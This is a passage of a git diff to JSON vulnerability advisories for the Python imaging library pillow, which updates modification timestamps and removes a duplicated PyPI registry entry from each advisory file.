"2026-09-10T20:25:15Z", "upstream": [ "CVE-2016-0740", "GHSA-hggx-3h72-49ww", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2016-0775.json b/advisories/BREW-pillow-CVE-2016-0775.json index 7c281b253d8..41ab7b10d0e 100644 --- a/advisories/BREW-pillow-CVE-2016-0775.json +++ b/advisories/BREW-pillow-CVE-2016-0775.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2016-0775", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2016-0775", "GHSA-8xjv-v9xq-m5h9", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2016-2533.json b/advisories/BREW-pillow-CVE-2016-2533.json index 772308b7561..b7654aac870 100644 --- a/advisories/BREW-pillow-CVE-2016-2533.json +++ b/advisories/BREW-pillow-CVE-2016-2533.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2016-2533", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2016-2533", "GHSA-3c5c-7235-994j", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2016-3076.json b/advisories/BREW-pillow-CVE-2016-3076.json index 25effbe1556..e24c57d1cc7 100644 --- a/advisories/BREW-pillow-CVE-2016-3076.json +++ b/advisories/BREW-pillow-CVE-2016-3076.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2016-3076", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2016-3076", "GHSA-v9pc-9mvp-x87g", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2016-4009.json b/advisories/BREW-pillow-CVE-2016-4009.json index ceac883f2c2..edb7b61f6cb 100644 --- a/advisories/BREW-pillow-CVE-2016-4009.json +++ b/advisories/BREW-pillow-CVE-2016-4009.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2016-4009", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2016-4009", "GHSA-hvr8-466p-75rh", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2016-9189.json b/advisories/BREW-pillow-CVE-2016-9189.json index 4610a982a1a..130ed7ddfef 100644 --- a/advisories/BREW-pillow-CVE-2016-9189.json +++ b/advisories/BREW-pillow-CVE-2016-9189.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2016-9189", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2016-9189", "GHSA-rwr3-c2q8-gm56", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2016-9190.json b/advisories/BREW-pillow-CVE-2016-9190.json index 84fbc6ba7a3..73bb3353b3c 100644 --- a/advisories/BREW-pillow-CVE-2016-9190.json +++ b/advisories/BREW-pillow-CVE-2016-9190.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2016-9190", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2016-9190", "GHSA-w4vg-rf63-f3j3", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2019-16865.json b/advisories/BREW-pillow-CVE-2019-16865.json index b5d6e23be48..7930f47c224 100644 --- a/advisories/BREW-pillow-CVE-2019-16865.json +++ b/advisories/BREW-pillow-CVE-2019-16865.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2019-16865", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2019-16865", "GHSA-j7mj-748x-7p78", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2019-19911.json b/advisories/BREW-pillow-CVE-2019-19911.json index e243d95ac49..74da4f33c45 100644 --- a/advisories/BREW-pillow-CVE-2019-19911.json +++ b/advisories/BREW-pillow-CVE-2019-19911.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2019-19911", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2019-19911", "GHSA-5gm3-px64-rw72", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-10177.json b/advisories/BREW-pillow-CVE-2020-10177.json index f09a9291da4..2674419749d 100644 --- a/advisories/BREW-pillow-CVE-2020-10177.json +++ b/advisories/BREW-pillow-CVE-2020-10177.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-10177", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-10177", "BIT-pillow-2020-10177", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-10378.json b/advisories/BREW-pillow-CVE-2020-10378.json index 172e078f36c..36308a59476 100644 --- a/advisories/BREW-pillow-CVE-2020-10378.json +++ b/advisories/BREW-pillow-CVE-2020-10378.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-10378", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-10378", "BIT-pillow-2020-10378", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-10379.json b/advisories/BREW-pillow-CVE-2020-10379.json index 8d0a81bfc70..8026e11a38d 100644 --- a/advisories/BREW-pillow-CVE-2020-10379.json +++ b/advisories/BREW-pillow-CVE-2020-10379.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-10379", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-10379", "BIT-pillow-2020-10379", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-10994.json b/advisories/BREW-pillow-CVE-2020-10994.json index bfc71201041..a2e444c8dcc 100644 --- a/advisories/BREW-pillow-CVE-2020-10994.json +++ b/advisories/BREW-pillow-CVE-2020-10994.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-10994", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-10994", "BIT-pillow-2020-10994", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-11538.json b/advisories/BREW-pillow-CVE-2020-11538.json index da494b19479..d13d94e9a14 100644 --- a/advisories/BREW-pillow-CVE-2020-11538.json +++ b/advisories/BREW-pillow-CVE-2020-11538.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-11538", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-11538", "BIT-pillow-2020-11538", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-35653.json b/advisories/BREW-pillow-CVE-2020-35653.json index d210caaae24..0b6b1b177b2 100644 --- a/advisories/BREW-pillow-CVE-2020-35653.json +++ b/advisories/BREW-pillow-CVE-2020-35653.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-35653", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-35653", "BIT-pillow-2020-35653", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-35654.json b/advisories/BREW-pillow-CVE-2020-35654.json index c37d4d75a23..d4893b7e7ce 100644 --- a/advisories/BREW-pillow-CVE-2020-35654.json +++ b/advisories/BREW-pillow-CVE-2020-35654.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-35654", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-35654", "BIT-pillow-2020-35654", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-35655.json b/advisories/BREW-pillow-CVE-2020-35655.json index 2d808d9f5da..3e95c4c1e50 100644 --- a/advisories/BREW-pillow-CVE-2020-35655.json +++ b/advisories/BREW-pillow-CVE-2020-35655.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-35655", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-35655", "BIT-pillow-2020-35655", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-5310.json b/advisories/BREW-pillow-CVE-2020-5310.json index f63fbd09abe..4051e34cddf 100644 --- a/advisories/BREW-pillow-CVE-2020-5310.json +++ b/advisories/BREW-pillow-CVE-2020-5310.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-5310", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-5310", "BIT-pillow-2020-5310", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-5311.json b/advisories/BREW-pillow-CVE-2020-5311.json index 82f1dbe6bd7..d0eca0d6a52 100644 --- a/advisories/BREW-pillow-CVE-2020-5311.json +++ b/advisories/BREW-pillow-CVE-2020-5311.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-5311", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-5311", "BIT-pillow-2020-5311", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-5312.json b/advisories/BREW-pillow-CVE-2020-5312.json index 57733864ef2..3bbd11dea87 100644 --- a/advisories/BREW-pillow-CVE-2020-5312.json +++ b/advisories/BREW-pillow-CVE-2020-5312.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-5312", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-5312", "BIT-pillow-2020-5312", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-5313.json b/advisories/BREW-pillow-CVE-2020-5313.json index 0af909b288d..f520b81822b 100644 --- a/advisories/BREW-pillow-CVE-2020-5313.json +++ b/advisories/BREW-pillow-CVE-2020-5313.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-5313", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-5313", "BIT-pillow-2020-5313", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-23437.json b/advisories/BREW-pillow-CVE-2021-23437.json index caaf7ef8949..8ad55685fc0 100644 --- a/advisories/BREW-pillow-CVE-2021-23437.json +++ b/advisories/BREW-pillow-CVE-2021-23437.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-23437", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-23437", "BIT-pillow-2021-23437", @@ -56,13 +56,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-25287.json b/advisories/BREW-pillow-CVE-2021-25287.json index 51767bae4c0..f67d29bb728 100644 --- a/advisories/BREW-pillow-CVE-2021-25287.json +++ b/advisories/BREW-pillow-CVE-2021-25287.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-25287", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-25287", "BIT-pillow-2021-25287", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-25288.json b/advisories/BREW-pillow-CVE-2021-25288.json index 17fdb6ad6f4..91868a8cc44 100644 --- a/advisories/BREW-pillow-CVE-2021-25288.json +++ b/advisories/BREW-pillow-CVE-2021-25288.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-25288", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-25288", "BIT-pillow-2021-25288", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-25289.json b/advisories/BREW-pillow-CVE-2021-25289.json index fe18c6e2e5d..9f1592922f4 100644 --- a/advisories/BREW-pillow-CVE-2021-25289.json +++ b/advisories/BREW-pillow-CVE-2021-25289.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-25289", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-25289", "BIT-pillow-2021-25289", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-25290.json b/advisories/BREW-pillow-CVE-2021-25290.json index 2a0fbfac29e..c3205992bad 100644 --- a/advisories/BREW-pillow-CVE-2021-25290.json +++ b/advisories/BREW-pillow-CVE-2021-25290.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-25290", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-25290", "BIT-pillow-2021-25290", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-25291.json b/advisories/BREW-pillow-CVE-2021-25291.json index 68c15620fe5..92dda4d1104 100644 --- a/advisories/BREW-pillow-CVE-2021-25291.json +++ b/advisories/BREW-pillow-CVE-2021-25291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-25291", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-25291", "BIT-pillow-2021-25291", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-25292.json b/advisories/BREW-pillow-CVE-2021-25292.json index 26939cd5eee..d32a91526ee 100644 --- a/advisories/BREW-pillow-CVE-2021-25292.json +++ b/advisories/BREW-pillow-CVE-2021-25292.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-25292", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-25292", "BIT-pillow-2021-25292", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-25293.json b/advisories/BREW-pillow-CVE-2021-25293.json index abf6e077746..b3f077b9d17 100644 --- a/advisories/BREW-pillow-CVE-2021-25293.json +++ b/advisories/BREW-pillow-CVE-2021-25293.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-25293", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-25293", "BIT-pillow-2021-25293", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-27921.json b/advisories/BREW-pillow-CVE-2021-27921.json index c875605de56..24020110e06 100644 --- a/advisories/BREW-pillow-CVE-2021-27921.json +++ b/advisories/BREW-pillow-CVE-2021-27921.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-27921", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-27921", "BIT-pillow-2021-27921", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-27922.json b/advisories/BREW-pillow-CVE-2021-27922.json index 273e3c6ec21..0baab61cb7d 100644 --- a/advisories/BREW-pillow-CVE-2021-27922.json +++ b/advisories/BREW-pillow-CVE-2021-27922.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-27922", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-27922", "BIT-pillow-2021-27922", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-27923.json b/advisories/BREW-pillow-CVE-2021-27923.json index b0dbcd4c4d5..2495bef4162 100644 --- a/advisories/BREW-pillow-CVE-2021-27923.json +++ b/advisories/BREW-pillow-CVE-2021-27923.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-27923", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-27923", "BIT-pillow-2021-27923", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-28675.json b/advisories/BREW-pillow-CVE-2021-28675.json index 524c8759a6a..6877282dad4 100644 --- a/advisories/BREW-pillow-CVE-2021-28675.json +++ b/advisories/BREW-pillow-CVE-2021-28675.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-28675", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-28675", "BIT-pillow-2021-28675", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-28676.json b/advisories/BREW-pillow-CVE-2021-28676.json index 256c69bca4e..0654309a9d6 100644 --- a/advisories/BREW-pillow-CVE-2021-28676.json +++ b/advisories/BREW-pillow-CVE-2021-28676.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-28676", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-28676", "BIT-pillow-2021-28676", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-28677.json b/advisories/BREW-pillow-CVE-2021-28677.json index 1f84e48fe9b..137a2aee01b 100644 --- a/advisories/BREW-pillow-CVE-2021-28677.json +++ b/advisories/BREW-pillow-CVE-2021-28677.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-28677", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-28677", "BIT-pillow-2021-28677", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-28678.json b/advisories/BREW-pillow-CVE-2021-28678.json index d33a36b96dd..cb0e5f1c55c 100644 --- a/advisories/BREW-pillow-CVE-2021-28678.json +++ b/advisories/BREW-pillow-CVE-2021-28678.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-28678", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-28678", "BIT-pillow-2021-28678", @@ -55,13 +55,6 @@ "subject_version": 